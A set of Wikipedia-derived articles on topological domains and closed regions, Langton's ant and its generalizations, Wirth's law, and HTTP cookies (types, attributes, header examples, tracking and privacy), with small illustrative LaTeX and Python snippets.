The basic idea of a connected subset of a space dates from the 19th century, but precise definitions vary slightly from generation to generation, author to author, and edition to edition, as concepts developed and terms were translated between German, French, and English works. In English, some authors use the term domain,[2]some use the term region,[3]some use both terms interchangeably,[4]and some define the two terms slightly differently;[5]some avoid ambiguity by sticking with a phrase such as non-empty connected open subset.[6]
One common convention is to define a domain as a connected open set but a region as the union of a domain with none, some, or all of its limit points.[7]A closed region or closed domain is the union of a domain and all of its limit points.
Various degrees of smoothness of the boundary of the domain are required for various properties of functions defined on the domain to hold, such as integral theorems (Green's theorem, Stokes theorem), properties of Sobolev spaces, and to define measures on the boundary and spaces of traces (generalized functions defined on the boundary). Commonly considered types of domains are domains with continuous boundary, Lipschitz boundary, C1 boundary, and so forth.
A bounded domain is a domain that is bounded, i.e., contained in some ball. Bounded region is defined similarly. An exterior domain or external domain is a domain whose complement is bounded; sometimes smoothness conditions are imposed on its boundary.
In complex analysis, a complex domain (or simply domain) is any connected open subset of the complex plane C. For example, the entire complex plane is a domain, as is the open unit disk, the open upper half-plane, and so forth. Often, a complex domain serves as the domain of definition for a holomorphic function. In the study of several complex variables, the definition of a domain is extended to include any connected open subset of Cn.
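As a concrete worked example of these definitions, the open unit disk is a complex domain, and taking its union with its limit points yields a closed region:

```latex
% Open unit disk: non-empty, open, and connected, hence a domain in C.
D = \{\, z \in \mathbb{C} : |z| < 1 \,\}
% Closed unit disk: the union of D with all of its limit points,
% i.e. a closed region (closed domain).
\overline{D} = \{\, z \in \mathbb{C} : |z| \le 1 \,\}
```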
In Euclidean spaces, one-, two-, and three-dimensional regions are curves, surfaces, and solids, whose extents are called, respectively, length, area, and volume.
Definition. An open set is connected if it cannot be expressed as the sum of two open sets. An open connected set is called a domain.
German:Eine offene Punktmenge heißt zusammenhängend, wenn man sie nicht als Summe von zwei offenen Punktmengen darstellen kann. Eine offene zusammenhängende Punktmenge heißt ein Gebiet.
According to Hans Hahn,[8]the concept of a domain as an open connected set was introduced by Constantin Carathéodory in his famous book (Carathéodory 1918).
In this definition, Carathéodory considers obviously non-empty disjoint sets.
Hahn also remarks that the word "Gebiet" ("Domain") was occasionally previously used as a synonym of open set.[9]The rough concept is older. In the 19th and early 20th century, the terms domain and region were often used informally (sometimes interchangeably) without explicit definition.[10]
However, the term "domain" was occasionally used to identify closely related but slightly different concepts. For example, in his influential monographs on elliptic partial differential equations, Carlo Miranda uses the term "region" to identify an open connected set,[11][12]and reserves the term "domain" to identify an internally connected,[13]perfect set, each point of which is an accumulation point of interior points,[11]following his former master Mauro Picone:[14]according to this convention, if a set A is a region then its closure is a domain.[11]
|
https://en.wikipedia.org/wiki/Closed_region
|
Langton's ant is a two-dimensional Turing machine with a very simple set of rules but complex emergent behavior. It was invented by Chris Langton in 1986 and runs on a square lattice of black and white cells.[1]The idea has been generalized in several different ways, such as turmites, which add more colors and more states.
Squares on a plane are colored variously either black or white. We arbitrarily identify one square as the "ant". The ant can travel in any of the four cardinal directions at each step it takes. The "ant" moves according to the following rules: at a white square, it turns 90° clockwise, flips the color of the square, and moves forward one unit; at a black square, it turns 90° counter-clockwise, flips the color of the square, and moves forward one unit.
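The turn-flip-move rules can be sketched as a short simulation. This is a minimal sketch rather than reference code: the coordinate system, the start at the origin, and the initial northward heading are assumptions.

```python
def langtons_ant(steps):
    """Run Langton's ant for the given number of steps on an all-white grid."""
    # Headings in clockwise order: north, east, south, west.
    dirs = [(0, 1), (1, 0), (0, -1), (-1, 0)]
    black = set()          # cells currently black; every other cell is white
    x, y, d = 0, 0, 0      # ant starts at the origin facing north
    for _ in range(steps):
        if (x, y) in black:   # black square: turn 90° counter-clockwise, flip to white
            d = (d - 1) % 4
            black.discard((x, y))
        else:                 # white square: turn 90° clockwise, flip to black
            d = (d + 1) % 4
            black.add((x, y))
        x, y = x + dirs[d][0], y + dirs[d][1]   # move forward one unit
    return (x, y), black
```

Running the simulation for on the order of ten thousand steps is enough to watch the early symmetric and chaotic phases give way to the recurrent "highway".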
Langton's ant can also be described as a cellular automaton, where the grid is colored black or white and the "ant" square has one of eight different colors assigned to encode the combination of black/white state and the current direction of motion of the ant.[2]
These simple rules lead to complex behavior. Three distinct modes of behavior are apparent,[3]when starting on a completely white grid.
All finite initial configurations tested eventually converge to the same repetitive pattern, suggesting that the "highway" is an attractor of Langton's ant, but no one has been able to prove that this is true for all such initial configurations. It is only known that the ant's trajectory is always unbounded regardless of the initial configuration[4]– this result was incorrectly attributed and is known as the Cohen-Kong theorem.[5]
In 2000, Gajardo et al. showed a construction that calculates any boolean circuit using the trajectory of a single instance of Langton's ant.[2]
Greg Turk and Jim Propp considered a simple extension to Langton's ant where instead of just two colors, more colors are used.[6]The colors are modified in a cyclic fashion. A simple naming scheme is used: for each of the successive colors, a letter "L" or "R" is used to indicate whether a left or right turn should be taken. Langton's ant has the name "RL" in this naming scheme.
Some of these extended Langton's ants produce patterns that become symmetric over and over again. One of the simplest examples is the ant "RLLR". One sufficient condition for this to happen is that the ant's name, seen as a cyclic list, consists of consecutive pairs of identical letters "LL" or "RR". The proof involves Truchet tiles.
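The multi-color extension can be simulated by generalizing the two-color rule to a rule string, one letter per color. A minimal sketch under the same assumed conventions as before (origin start, northward heading); the rule "RL" reproduces the original ant.

```python
def multicolor_ant(rule, steps):
    """Simulate a Turk-Propp ant given its rule string, e.g. "RL" or "RLLR"."""
    dirs = [(0, 1), (1, 0), (0, -1), (-1, 0)]  # north, east, south, west (clockwise)
    grid = {}              # cell -> color index; absent cells have color 0
    x, y, d = 0, 0, 0      # start at the origin facing north
    k = len(rule)
    for _ in range(steps):
        c = grid.get((x, y), 0)
        # Letter c of the rule says which way to turn on a cell of color c.
        d = (d + 1) % 4 if rule[c] == "R" else (d - 1) % 4
        grid[(x, y)] = (c + 1) % k             # advance the cell's color cyclically
        x, y = x + dirs[d][0], y + dirs[d][1]  # move forward one unit
    return (x, y), grid
```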
The hexagonal grid permits up to six different rotations, which are notated here as N (no change), R1(60° clockwise), R2(120° clockwise), U (180°), L2(120° counter-clockwise), L1(60° counter-clockwise).
A further extension of Langton's ants is to consider multiple states of the Turing machine – as if the ant itself has a color that can change. These ants are called turmites, a contraction of "Turing machine termites". Common behaviours include the production of highways, chaotic growth and spiral growth.[7]
Multiple Langton's ants can co-exist on the 2D plane, and their interactions give rise to complex, higher-order automata that collectively build a wide variety of organized structures.
There are different ways of modelling their interaction and the results of the simulation may strongly depend on the choices made.[8]
Multiple turmites can co-exist on the 2D plane as long as there is a rule that defines what happens when they meet. Ed Pegg, Jr. considered ants that can turn, for example, both left and right, splitting in two and annihilating each other when they meet.[9]
|
https://en.wikipedia.org/wiki/Langton%27s_ant
|
Wirth's law is an adage on computer performance which states that software is getting slower more rapidly than hardware is becoming faster.
The adage is named after Niklaus Wirth, a computer scientist who discussed it in his 1995 article "A Plea for Lean Software".[1][2]
Wirth attributed the saying to Martin Reiser, who in the preface to his book on the Oberon System wrote: "The hope is that the progress in hardware will cure all software ills. However, a critical observer may observe that software manages to outgrow hardware in size and sluggishness."[3]Other observers had noted this for some time before; indeed, the trend was becoming obvious as early as 1987.[4]
He states two contributing factors to the acceptance of ever-growing software: "rapidly growing hardware performance" and "customers' ignorance of features that are essential versus nice-to-have".[1]Enhanced user convenience and functionality supposedly justify the increased size of software, but Wirth argues that people increasingly misinterpret complexity as sophistication, and that "these details are cute but not essential, and they have a hidden cost".[1]As a result, he calls for the creation of "leaner" software and pioneered the development of Oberon, a software system developed between 1986 and 1989 based on nothing but hardware. Its primary goal was to show that software can be developed with a fraction of the memory capacity and processor power usually required, without sacrificing flexibility, functionality, or user convenience.[1]
The law was restated in 2009 and attributed to Google co-founder Larry Page. It has been referred to as Page's law.[5]The first use of that name is attributed to fellow Google co-founder Sergey Brin at the 2009 Google I/O Conference.[6]
Other common forms use the names of the leading hardware and software companies of the 1990s, Intel and Microsoft, or their CEOs, Andy Grove and Bill Gates, for example "What Intel giveth, Microsoft taketh away"[7]and Andy and Bill's law: "What Andy giveth, Bill taketh away".[8]
Gates's law ("The speed of software halves every 18 months"[9]) is an anonymously coined variant on Wirth's law, its name referencing Bill Gates,[9]co-founder of Microsoft. It is an observation that the speed of commercial software generally slows by 50% every 18 months, thereby negating all the benefits of Moore's law. This could occur for a variety of reasons: feature creep, code cruft, developer laziness, lack of funding, forced updates, forced porting (to a newer OS or to support a new technology) or a management turnover whose design philosophy does not coincide with the previous manager.[10]
May's law, named after David May, is a variant stating: "Software efficiency halves every 18 months, compensating Moore's law".[11]
|
https://en.wikipedia.org/wiki/Wirth%27s_law
|
HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small block of data created by a web server while a user is browsing a website and placed on the user's computer or other device by the user's web browser. Cookies are placed on the device used to access a website, and more than one cookie may be placed on a user's device during a session.
Cookies serve useful and sometimes essential functions on the web. They enable web servers to store stateful information (such as items added in the shopping cart in an online store) on the user's device or to track the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past).[1]They can also be used to save information that the user previously entered into form fields, such as names, addresses, passwords, and payment card numbers for subsequent use.
Authentication cookies are commonly used by web servers to authenticate that a user is logged in, and with which account they are logged in. Without the cookie, users would need to authenticate themselves by logging in on each page containing sensitive information that they wish to access. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted. Security vulnerabilities may allow a cookie's data to be read by an attacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see cross-site scripting and cross-site request forgery for examples).[2]
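As an illustration of the mechanics (not of any particular website's scheme), Python's standard http.cookies module can build and parse the headers involved. The cookie name "session" and the helper function names below are assumptions for the sketch.

```python
from http.cookies import SimpleCookie

def make_session_cookie(session_id):
    """Server side: build a Set-Cookie header carrying an authentication token."""
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = True   # keep the cookie out of reach of page scripts
    c["session"]["path"] = "/"        # send it with every request to this site
    return c.output()                 # a "Set-Cookie: ..." header line

def read_session_cookie(cookie_header):
    """Server side: recover the session id from a request's Cookie header."""
    c = SimpleCookie(cookie_header)
    return c["session"].value if "session" in c else None
```

A real deployment would also mark the cookie Secure and tie the session id to server-side state, which is exactly the statefulness cookies were introduced to provide.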
Tracking cookies, and especially third-party tracking cookies, are commonly used as ways to compile long-term records of individuals' browsing histories — a potential privacy concern that prompted European[3]and U.S. lawmakers to take action in 2011.[4][5]European law requires that all websites targeting European Union member states gain "informed consent" from users before storing non-essential cookies on their device.
The term cookie was coined by web-browser programmer Lou Montulli. It was derived from the term magic cookie, which is a packet of data a program receives and sends back unchanged, used by Unix programmers.[6][7]
Magic cookies were already used in computing when computer programmer Lou Montulli had the idea of using them in web communications in June 1994.[8] At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for MCI. Vint Cerf and John Klensin represented MCI in technical discussions with Netscape Communications. MCI did not want its servers to have to retain partial transaction states, which led them to ask Netscape to find a way to store that state in each user's computer instead. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.[9][10]
Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape, released on October 13, 1994,[11][12] supported cookies.[10] The first use of cookies (outside the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, which was granted in 1998.[13] Support for cookies was integrated into Internet Explorer in version 2, released in October 1995.[14]
The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of their presence.[15] The public learned about cookies after the Financial Times published an article about them on February 12, 1996.[16] In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997.[2]
The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the Internet Engineering Task Force (IETF) was formed. Two alternative proposals for introducing state in HTTP transactions had been put forward by Brian Behlendorf and David Kristol respectively. But the group, headed by Kristol himself and Lou Montulli, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specified that third-party cookies were either not allowed at all, or at least not enabled by default.[17] At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies in RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.
RFC 2965 added a Set-Cookie2 header field, which informally came to be called "RFC 2965-style cookies" as opposed to the original Set-Cookie header field, which was called "Netscape-style cookies".[18][19] Set-Cookie2 was seldom used, however, and was deprecated in RFC 6265 in April 2011, which was written as a definitive specification for cookies as used in the real world.[20] No modern browser recognizes the Set-Cookie2 header field.[21]
A session cookie (also known as an in-memory cookie, transient cookie or non-persistent cookie) exists only in temporary memory while the user navigates a website.[22] Session cookies expire or are deleted when the user closes the web browser.[23] Session cookies are identified by the browser by the absence of an expiration date assigned to them.
A persistent cookie expires at a specific date or after a specific length of time. Throughout the lifespan set by its creator, the persistent cookie's information will be transmitted to the server every time the user visits the website that it belongs to, or every time the user views a resource belonging to that website from another website (such as an advertisement).
For this reason, persistent cookies are sometimes referred to as tracking cookies[24][25] because they can be used by advertisers to record information about a user's web browsing habits over an extended period of time. Persistent cookies are also used for reasons such as keeping users logged into their accounts on websites, to avoid re-entering login credentials at every visit. (See § Uses, below.)
A secure cookie can only be transmitted over an encrypted connection (i.e. HTTPS). It cannot be transmitted over unencrypted connections (i.e. HTTP). This makes the cookie less likely to be exposed to cookie theft via eavesdropping. A cookie is made secure by adding the Secure flag to the cookie.
An http-only cookie cannot be accessed by client-side APIs, such as JavaScript. This restriction eliminates the threat of cookie theft via cross-site scripting (XSS).[26] However, the cookie remains vulnerable to cross-site tracing (XST) and cross-site request forgery (CSRF) attacks. A cookie is given this characteristic by adding the HttpOnly flag to the cookie.
In 2016, Google Chrome version 51 introduced[27] a new kind of cookie with the attribute SameSite, with possible values of Strict, Lax, or None.[28] With the attribute SameSite=Strict, browsers will only send cookies to a target domain that is the same as the origin domain. This effectively mitigates cross-site request forgery (CSRF) attacks. With SameSite=Lax, browsers will send cookies with requests to a target domain even if it is different from the origin domain, but only for safe requests such as GET (POST is unsafe) and not for third-party contexts (e.g., inside an iframe). The attribute SameSite=None allows third-party (cross-site) cookies; however, most browsers require the Secure attribute on SameSite=None cookies.[29]
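As a sketch of how the three values appear in response headers (the cookie names and values here are illustrative, not from any particular site):

```http
Set-Cookie: csrftoken=abc123; SameSite=Strict
Set-Cookie: prefs=dark; SameSite=Lax
Set-Cookie: tracker=xyz789; SameSite=None; Secure
```

Note that the SameSite=None cookie also carries the Secure attribute, which most browsers require for that value.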
The SameSite cookie attribute was incorporated into a new RFC draft for "Cookies: HTTP State Management Mechanism"[30] to update RFC 6265 (if approved).
Chrome, Firefox, and Edge started to support same-site cookies.[31] The key to the rollout is the treatment of existing cookies without the SameSite attribute defined. Chrome has been treating those existing cookies as if SameSite=None, which lets all websites and applications run as before. Google intended to change that default to SameSite=Lax in Chrome 80, planned for release in February 2020,[32] but due to the potential for breakage of applications and websites that rely on third-party/cross-site cookies, and due to COVID-19 circumstances, Google postponed this change to Chrome 84.[33][34]
A supercookie is a cookie with an origin of a top-level domain (such as .com) or a public suffix (such as .co.uk). Ordinary cookies, by contrast, have an origin of a specific domain name, such as example.com.
Supercookies can be a potential security concern and are therefore often blocked by web browsers. If unblocked by the browser, an attacker in control of a malicious website could set a supercookie and potentially disrupt or impersonate legitimate user requests to another website that shares the same top-level domain or public suffix as the malicious website. For example, a supercookie with an origin of .com could maliciously affect a request made to example.com, even if the cookie did not originate from example.com. This can be used to fake logins or change user information.
The Public Suffix List[35] helps to mitigate the risk that supercookies pose. The Public Suffix List is a cross-vendor initiative that aims to provide an accurate and up-to-date list of domain name suffixes. Older versions of browsers may not have an up-to-date list, and will therefore be vulnerable to supercookies from certain domains.
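The check a browser performs can be sketched as follows. This is a minimal illustration only: it uses a tiny hardcoded sample of suffixes, whereas real browsers consult the full, regularly updated Public Suffix List.

```python
# A tiny, illustrative sample of the Public Suffix List; the real list
# contains thousands of entries and is updated regularly.
PUBLIC_SUFFIXES = {"com", "org", "co.uk", "github.io"}

def is_supercookie_domain(cookie_domain: str) -> bool:
    """A cookie whose Domain attribute is itself a public suffix would be a supercookie."""
    return cookie_domain.lstrip(".").lower() in PUBLIC_SUFFIXES

print(is_supercookie_domain(".com"))         # True: would affect every .com site
print(is_supercookie_domain("example.com"))  # False: an ordinary, specific domain
print(is_supercookie_domain(".co.uk"))       # True: a public suffix, not a real site
```

A browser applying this test would refuse to store the cookie in the first and third cases.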
The term supercookie is sometimes used for tracking technologies that do not rely on HTTP cookies. Two such supercookie mechanisms were found on Microsoft websites in August 2011: cookie syncing that respawned MUID (machine unique identifier) cookies, and ETag cookies.[36] Due to media attention, Microsoft later disabled this code.[37] In a 2021 blog post, Mozilla used the term supercookie to refer to the use of browser cache as a means of tracking users across sites.[38]
A zombie cookie is data and code that has been placed by a web server on a visitor's computer or other device in a hidden location outside the visitor's web browser's dedicated cookie storage location, and that automatically recreates an HTTP cookie as a regular cookie after the original cookie has been deleted. The zombie cookie may be stored in multiple locations, such as Flash Local shared objects, HTML5 Web storage, and other client-side and even server-side locations, and when absence is detected in one of the locations, the missing instance is recreated by the JavaScript code using the data stored in other locations.[39][40]
A cookie wall pops up on a website and informs the user of the website's cookie usage. It has no reject option, and the website is not accessible without tracking cookies.
A cookie consists of the following components:[41][42][43] a name, a value, and zero or more attributes, such as Domain, Path, Expires or Max-Age, Secure, and HttpOnly, which control the cookie's scope, lifetime, and security.
Cookies were originally introduced to provide a way for users to record items they want to purchase as they navigate throughout a website (a virtual shopping cart or shopping basket).[9][10] Today, however, the contents of a user's shopping cart are usually stored in a database on the server, rather than in a cookie on the client. To keep track of which user is assigned to which shopping cart, the server sends a cookie to the client that contains a unique session identifier (typically, a long string of random letters and numbers). Because cookies are sent to the server with every request the client makes, that session identifier will be sent back to the server every time the user visits a new page on the website, which lets the server know which shopping cart to display to the user.
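The server-side bookkeeping just described can be sketched in a few lines. This is a minimal illustration under invented names (SESSION_CARTS, start_session), not any particular server's implementation:

```python
import secrets

# Hypothetical in-memory store mapping session identifiers to shopping carts.
SESSION_CARTS = {}

def start_session() -> str:
    """Issue a new random session identifier, as a server might on a first visit.

    In practice the identifier would be sent to the browser in a Set-Cookie
    header and echoed back in the Cookie header of later requests.
    """
    session_id = secrets.token_hex(16)  # a long string of random characters
    SESSION_CARTS[session_id] = []      # a fresh, empty cart for this session
    return session_id

def add_to_cart(session_id: str, item: str) -> None:
    """Look up the cart by the session identifier the client sent back."""
    SESSION_CARTS[session_id].append(item)

sid = start_session()
add_to_cart(sid, "book")
add_to_cart(sid, "pen")
print(SESSION_CARTS[sid])  # ['book', 'pen']
```

The cookie itself carries only the opaque identifier; all cart contents stay on the server.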
Another popular use of cookies is for logging into websites. When the user visits a website's login page, the web server typically sends the client a cookie containing a unique session identifier. When the user successfully logs in, the server remembers that this particular session identifier has been authenticated and grants the user access to its services.
Because session cookies contain only a unique session identifier, the amount of personal information that a website can save about each user is virtually limitless; the website is not bound by restrictions on how large a cookie can be. Session cookies also help to improve page load times, since the amount of information in a session cookie is small and requires little bandwidth.
Cookies can be used to remember information about the user in order to show relevant content to that user over time. For example, a web server might send a cookie containing the username that was last used to log into a website, so that it may be filled in automatically the next time the user logs in.
Many websites use cookies for personalization based on the user's preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page on the website, the server can personalize the page according to the user's preferences. For example, the Google search engine once used cookies to allow users (even non-registered ones) to decide how many search results per page they wanted to see.
Also, DuckDuckGo uses cookies to allow users to set viewing preferences such as the colors of the web page.
Tracking cookies are used to track users' web browsing habits. This can also be done to some extent by using the IP address of the computer requesting the page or the referer field of the HTTP request header, but cookies allow for greater precision. This can be demonstrated as follows: if the user requests a page of the site but the request contains no cookie, the server presumes that this is the first page visited by the user, so the server creates a unique identifier (typically a string of random letters and numbers) and sends it as a cookie back to the browser together with the requested page. From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested; the server sends the page as usual but also stores the URL of the requested page, the date and time of the request, and the cookie in a log file.
By analyzing this log file, it is then possible to find out which pages the user has visited, in what sequence, and for how long.
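As an illustration of that analysis, the sketch below groups logged requests by cookie identifier to reconstruct each visitor's page sequence. The log format and the identifiers are invented for the example:

```python
from collections import defaultdict

# Hypothetical log entries: (cookie ID, ISO timestamp, requested URL).
log = [
    ("user42", "2024-05-01T10:00:00", "/index.html"),
    ("user42", "2024-05-01T10:02:30", "/products.html"),
    ("user99", "2024-05-01T10:03:00", "/index.html"),
    ("user42", "2024-05-01T10:05:00", "/checkout.html"),
]

# Group requests by cookie ID, in timestamp order, to recover each
# visitor's browsing sequence.
histories = defaultdict(list)
for cookie_id, timestamp, url in sorted(log, key=lambda entry: entry[1]):
    histories[cookie_id].append(url)

print(histories["user42"])  # ['/index.html', '/products.html', '/checkout.html']
```

Each cookie identifier yields one visitor's ordered page history, which is exactly what makes cookie-based tracking more precise than IP- or referer-based methods.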
Corporations exploit users' web habits by using tracking cookies to collect information about buying habits. The Wall Street Journal found that America's top fifty websites installed an average of sixty-four pieces of tracking technology onto computers, resulting in a total of 3,180 tracking files.[44] The data can then be collected and sold to bidding corporations.
Cookies are arbitrary pieces of data, usually chosen and first sent by the web server, and stored on the client computer by the web browser. The browser then sends them back to the server with every request, introducing state (memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a web page or component of a web page would be an isolated event, largely unrelated to all other page views made by the user on the website. Although cookies are usually set by the web server, they can also be set by the client using a scripting language such as JavaScript (unless the cookie's HttpOnly flag is set, in which case the cookie cannot be modified by scripting languages).
The cookie specifications[45][46] require that browsers meet the following requirements in order to support cookies: they must be able to store cookies of at least 4,096 bytes, at least 50 cookies per domain, and at least 3,000 cookies in total.
Cookies are set using the Set-Cookie header field, sent in an HTTP response from the web server. This header field instructs the web browser to store the cookie and send it back in future requests to the server (the browser will ignore this header field if it does not support cookies or has disabled cookies).
As an example, the browser sends its first HTTP request for the homepage of the www.example.org website:
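Reconstructing the request being described (a minimal sketch; the headers a real browser sends would be longer):

```http
GET /index.html HTTP/1.1
Host: www.example.org
```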
The server responds with two Set-Cookie header fields:
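A sketch of such a response, using the two cookies this section discusses, theme and sessionToken (the values and the expiry date are illustrative):

```http
HTTP/1.0 200 OK
Content-Type: text/html
Set-Cookie: theme=light
Set-Cookie: sessionToken=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT
```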
The server's HTTP response contains the contents of the website's homepage. But it also instructs the browser to set two cookies. The first, theme, is considered to be a session cookie since it does not have an Expires or Max-Age attribute. Session cookies are intended to be deleted by the browser when the browser closes. The second, sessionToken, is considered to be a persistent cookie since it contains an Expires attribute, which instructs the browser to delete the cookie at a specific date and time.
Next, the browser sends another request to visit the spec.html page on the website. This request contains a Cookie header field, which contains the two cookies that the server instructed the browser to set:
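A sketch of that follow-up request (cookie values are illustrative; the Cookie field simply echoes whatever name–value pairs the server previously set):

```http
GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: theme=light; sessionToken=abc123
```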
This way, the server knows that this HTTP request is related to the previous one. The server would answer by sending the requested page, possibly including more Set-Cookie header fields in the HTTP response in order to instruct the browser to add new cookies, modify existing cookies, or remove existing cookies. To remove a cookie, the server must include a Set-Cookie header field with an expiration date in the past.
The value of a cookie may consist of any printable ASCII character (! through ~, Unicode \u0021 through \u007E) excluding , and ; and whitespace characters. The name of a cookie excludes the same characters, as well as =, since that is the delimiter between the name and value. The cookie standard RFC 2965 is more restrictive but not implemented by browsers.
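A quick sketch of that character rule as stated above (an illustration of the constraint, not a full RFC 6265 grammar):

```python
def is_valid_cookie_value(value: str) -> bool:
    """Printable ASCII (U+0021 through U+007E) excluding comma, semicolon, whitespace."""
    return all("\u0021" <= ch <= "\u007e" and ch not in ",;" for ch in value)

def is_valid_cookie_name(name: str) -> bool:
    """Same rule as values, additionally excluding '=', the name/value delimiter."""
    return is_valid_cookie_value(name) and "=" not in name

print(is_valid_cookie_value("abc123"))  # True
print(is_valid_cookie_value("a b"))     # False: contains whitespace
print(is_valid_cookie_name("theme"))    # True
print(is_valid_cookie_name("a=b"))      # False: contains '='
```

Whitespace characters fall outside the U+0021 to U+007E range, so the range check excludes them automatically.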
The term cookie crumb is sometimes used to refer to a cookie's name–value pair.[47]
Cookies can also be set by scripting languages such as JavaScript that run within the browser. In JavaScript, the object document.cookie is used for this purpose. For example, the instruction document.cookie = "temperature=20" creates a cookie of name temperature and value 20.[48]
In addition to a name and value, cookies can also have one or more attributes. Browsers do not include cookie attributes in requests to the server; they only send the cookie's name and value. Cookie attributes are used by browsers to determine when to delete a cookie, whether to block a cookie, and whether to send a cookie to the server.
The Domain and Path attributes define the scope of the cookie. They essentially tell the browser what website the cookie belongs to. For security reasons, cookies can only be set on the current resource's top domain and its subdomains, and not for another domain and its subdomains. For example, the website example.org cannot set a cookie that has a domain of foo.com, because this would allow the website example.org to control the cookies of the domain foo.com.
If a cookie's Domain and Path attributes are not specified by the server, they default to the domain and path of the resource that was requested.[49] However, in most browsers there is a difference between a cookie set from foo.com without a domain, and a cookie set with the foo.com domain. In the former case, the cookie will only be sent for requests to foo.com; this is known as a host-only cookie. In the latter case, all subdomains are also included (for example, docs.foo.com).[50][51] A notable exception to this general rule is Edge prior to Windows 10 RS3 and Internet Explorer prior to IE 11 and Windows 10 RS4 (April 2018), which always send cookies to subdomains regardless of whether the cookie was set with or without a domain.[52]
Below is an example of some Set-Cookie header fields in the HTTP response of a website after a user logged in. The HTTP request was sent to a webpage within the docs.foo.com subdomain:
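A sketch of the response headers being described (the cookie values and the expiry date are placeholders):

```http
HTTP/1.0 200 OK
Set-Cookie: LSID=abc123; Path=/accounts; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=def456; Domain=.foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=ghi789; Domain=foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
```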
The first cookie, LSID, has no Domain attribute, and has a Path attribute set to /accounts. This tells the browser to use the cookie only when requesting pages contained in docs.foo.com/accounts (the domain is derived from the request domain). The other two cookies, HSID and SSID, would be used when the browser requests any subdomain of .foo.com on any path (for example www.foo.com/bar). The prepended dot is optional in recent standards, but can be added for compatibility with RFC 2109 based implementations.[53]
The Expires attribute defines a specific date and time when the browser should delete the cookie. The date and time are specified in the form Wdy, DD Mon YYYY HH:MM:SS GMT, or in the form Wdy, DD Mon YY HH:MM:SS GMT for values of YY between 0 and 69 inclusive.[54]
Alternatively, the Max-Age attribute can be used to set the cookie's expiration as an interval of seconds in the future, relative to the time the browser received the cookie. Below is an example of three Set-Cookie header fields that were received from a website after a user logged in:
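A sketch of the three header fields being described (cookie values are placeholders; the attributes match the behavior explained in the next paragraph):

```http
HTTP/1.0 200 OK
Set-Cookie: lu=placeholder_value; Expires=Tue, 15 Jan 2013 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly
Set-Cookie: made_write_conn=placeholder_value; Path=/; Domain=.example.com
Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.example.com; HttpOnly
```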
The first cookie, lu, is set to expire sometime on 15 January 2013. It will be used by the client browser until that time. The second cookie, made_write_conn, does not have an expiration date, making it a session cookie. It will be deleted after the user closes their browser. The third cookie, reg_fb_gate, has its value changed to deleted, with an expiration time in the past. The browser will delete this cookie right away because its expiration time is in the past. Note that the cookie will only be deleted if the domain and path attributes in the Set-Cookie field match the values used when the cookie was created.
As of 2016[update], Internet Explorer did not support Max-Age.[55][56]
The Secure and HttpOnly attributes do not have associated values. Rather, the presence of just their attribute names indicates that their behaviors should be enabled.
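For illustration, a Set-Cookie field carrying both flags might look like this (the cookie name and value are invented):

```http
Set-Cookie: sessionToken=abc123; Secure; HttpOnly
```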
The Secure attribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only via secure/encrypted connections. However, if a web server sets a cookie with a Secure attribute from a non-secure connection, the cookie can still be intercepted when it is sent to the user by man-in-the-middle attacks. Therefore, for maximum security, cookies with the Secure attribute should only be set over a secure connection.
The HttpOnly attribute directs browsers not to expose cookies through channels other than HTTP (and HTTPS) requests. This means that the cookie cannot be accessed via client-side scripting languages (notably JavaScript), and therefore cannot be stolen easily via cross-site scripting (a pervasive attack technique).[57]
Most modern browsers support cookies and allow the user to disable them. Common options include accepting or blocking cookies entirely, viewing and selectively deleting cookies, and clearing all cookies along with other private data.[58]
Add-on tools for managing cookie permissions also exist.[59][60][61][62]
Cookies have some important implications for the privacy and anonymity of web users. While cookies are sent only to the server setting them or a server in the same Internet domain, a web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called third-party cookies. A third-party cookie belongs to a domain different from the one shown in the address bar. This sort of cookie typically appears when web pages feature content from external websites, such as banner advertisements. This opens up the potential for tracking the user's browsing history and is used by advertisers to serve relevant advertisements to each user.
As an example, suppose a user visits www.example.org. This website contains an advertisement from ad.foxytracking.com, which, when downloaded, sets a cookie belonging to the advertisement's domain (ad.foxytracking.com). Then, the user visits another website, www.foo.com, which also contains an advertisement from ad.foxytracking.com and sets a cookie belonging to that domain (ad.foxytracking.com). Eventually, both of these cookies will be sent to the advertiser when loading their advertisements or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites that have ads from this advertiser, through the use of the HTTP referer header field.
As of 2014[update], some websites were setting cookies readable by over 100 third-party domains.[63] On average, a single website was setting 10 cookies, with the maximum number of cookies (first- and third-party) reaching over 800.[64]
